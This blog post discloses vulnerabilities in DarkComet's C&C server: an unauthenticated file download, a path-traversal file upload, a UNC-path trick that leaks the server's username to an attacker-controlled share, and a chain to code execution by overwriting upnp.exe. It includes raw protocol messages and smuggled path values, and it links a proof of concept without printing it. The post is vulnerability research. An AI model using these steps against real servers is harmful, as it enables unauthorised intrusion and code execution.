This post will introduce a file upload vulnerability in DarkComet’s C&C server. While a flaw that allows an attacker to download files has already been known for many years there is no mention of this very similar vulnerability. A quick disclaimer before we go into the actual matter: Hacking a C&C server might seem morally justified but it is still illegal. Don’t do it.

Intro

DarkComet has been used by script kiddies and repressive regimes alike. I started the search for a vulnerability a few days ago and found many interesting articles on DarkComet. All of them mention the file download vulnerability we will now look at. The DarkComet C&C server uses a QUICKUP command to upload files to the clients. It looks like this (C denotes the client and S the server):

S: QUICKUPC:\some\file.jpg|123|UPLOADEXEC

The client then opens a new connection:

S: IDTYPE
C: QUICKUP123|C:\some\file.jpg|UPLOADEXEC
S: \x41\x00\x43
C: A
S: <file length>
C: A
S: <raw file data>

The C&C server doesn’t check whether it ever issued an upload command. This means anyone who connects to the server can download any file. Unfortunately since there is no way to get the server to list all files in a directory this vulnerability is limited to downloading files with a known name. Usually the only interesting files are comet.db which contains a list of all victims and keylog data and config.ini which may contain no-ip.org passwords.

While this vulnerability is interesting there is nothing like a remote code execution vulnerability. A logical starting point would be to look into the upload functionality of DarkComet:

Upload functionality

When the C&C server tries to download a file this is what happens:

S: DOWNLOADFILE596|C:\some\file.jpg

The client then opens a new connection:

S: IDTYPE
C: FILETRANSFER0|596
S: \x41\x00\x43
C: FILEBOFC:\some\file.jpg|0
S: A
C: <raw file data>

The server will now write the file into a user specified directory with the filename file.jpg. While this might seem trivially exploitable it unfortunately isn’t. The 596 in DOWNLOADFILE596 is the socket handle of the client and the server wouldn’t accept FILETRANSFER0|596 if it didn’t already issue a DOWNLOADFILE with the same handle.

This leaves us with a pretty useless vulnerability: We can upload arbitrary files in a directory we can’t control under the condition that we can guess a socket handle the server already downloaded a file from. Guessing a socket handle isn’t really hard (they always seem to be a multiple of four and are usually between 400 and 2300). We will however need to use a trick to get the file into a directory specified by us:

Path shenanigans

Since we can control the file name in the FILEBOFC:\some\file.jpg|0 message we can try some path shenanigans. And behold: The server uses split("\") to get the file name. This means we can simply change the message to FILEBOFC:\some\../../../Windows/file.jpg|0 and the server will use ../../../Windows/file.jpg as the file name. The Windows API however won’t care and will happily interpret / as a path delimiter. Using this trick we can upload the file into any directory on the drive.

With some more shenanigans we can also get the username of the user running DarkComet: For this we will use UNC paths and the file download vulnerability:

QUICKUP123|\\our.domain.tld\test.txt|UPLOADEXEC

The C&C server will try to connect to our network share and leak the user and computer name. This information can now be used for our final trick:

Remote code execution

The DarkComet C&C server will by default try to use UPnP to automatically open ports. It does this by writing a file called upnp.exe into the Temp directory and calling it when necessary. To execute our own code we can use the file upload vulnerability with the fact that the server leaks the username when connecting to a network share and upload an executable to C:\Users\<username>\AppData\Local\Temp\upnp.exe. The next time the C&C server restarts our code will get executed.

Proof of concept

A proof of concept can be found here.

Conclusion

While not being an easily exploitable vulnerability this could be used against many of the DarkComet C&C servers in the wild. A dedicated attacker could even write a script that acts like a normal client and tries to trick the C&C server into downloading files by conveniently placing passwords.txt or nudes.jpg on their desktop. This would remove the need to guess a socket handle and make sure that the conditions of the vulnerability are met.

DarkComet and other C&C servers are a cool starting place for beginners searching for vulnerabilites. This is because they are often written by people without any proper security practices, they are network based applications and they can easily be found in the wild.